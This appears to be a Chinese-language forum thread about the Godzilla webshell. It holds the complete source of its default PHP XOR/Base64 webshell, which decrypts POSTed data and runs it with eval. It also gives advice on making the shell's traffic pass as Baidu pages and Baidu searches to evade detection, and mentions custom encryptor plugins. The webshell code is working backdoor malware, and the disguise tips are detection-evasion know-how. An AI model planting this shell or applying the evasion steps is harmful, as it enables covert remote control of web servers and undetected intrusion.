感觉哥斯拉的特征太明显了

[xsshim]

前面16位字母是大写的，最后16位字母也是大写的，中间是普通的base64字符串，这也太明显了

[BeichenDream]

哥斯拉不同的加密器所发送的流量都是不同的，例如说PHP_XOR_BASE64

默认生成的脚本是这样的

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
		eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

流量是这样的

但是你可以在生成的脚本里面加任何输出，哥斯拉也能照样识别，例如说你可以套一个百度的网页

把内容都复制到生成的shell

test.txt

然后流量就变成了百度

你还可以配置一下请求追加

于是流量伪装成了百度的搜索

[BeichenDream]

哥斯拉从v1.0开始，就支持自定义加密器，通过插件的方式动态加载，不过一直没时间写文档，可以自行反编译学习，自定义加密器支持自定义加密算法，和流量查找以及发送逻辑

[xsshim]

兄弟，我研究完哥斯拉的插件回来了，想问一下，可以给我学习一下 shells.payloads.java.assets 下面的 payload.classs 的代码吗？反编译出来好难看啊